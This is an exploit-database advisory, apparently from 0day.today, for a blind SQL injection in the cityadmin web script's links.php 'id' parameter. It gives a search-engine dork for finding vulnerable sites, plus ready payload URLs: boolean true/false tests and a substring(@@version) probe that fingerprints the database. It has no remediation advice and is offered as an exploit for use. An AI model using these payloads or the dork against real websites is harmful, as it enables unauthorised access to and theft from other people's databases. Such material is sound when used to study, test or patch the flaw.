id: 10759
date: 02/03/2010
title: cityadmin (links.php) Blind Sql Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

=======================================================
cityadmin (links.php) Blind Sql Injection Vulnerability
=======================================================

.:. Script         : cityadmin
.:. Download Script: http://www.redcow.ca/products/cityadmin/
.:. Bug Type       : Blind Sql Injection
.:. Dork           : "Powered by cityadmin and Red Cow Technologies, Inc."
 
####################################################################
 
===[ Exploit ]===
 
www.site.com/links.php?id=[Blind SQL INJECTION]
 
 
www.site.com/links.php?id=NULL+and+1=1       >>> True
www.site.com/links.php?id=NULL+and+1=2       >>> False
 
 
www.site.com/links.php?id=NULL+and+substring(@@version,1,1)=5  >>> True
www.site.com/links.php?id=NULL+and+substring(@@version,1,1)=4  >>> False
 
 
 
####################################################################



#  0day.today [2023-03-26]  #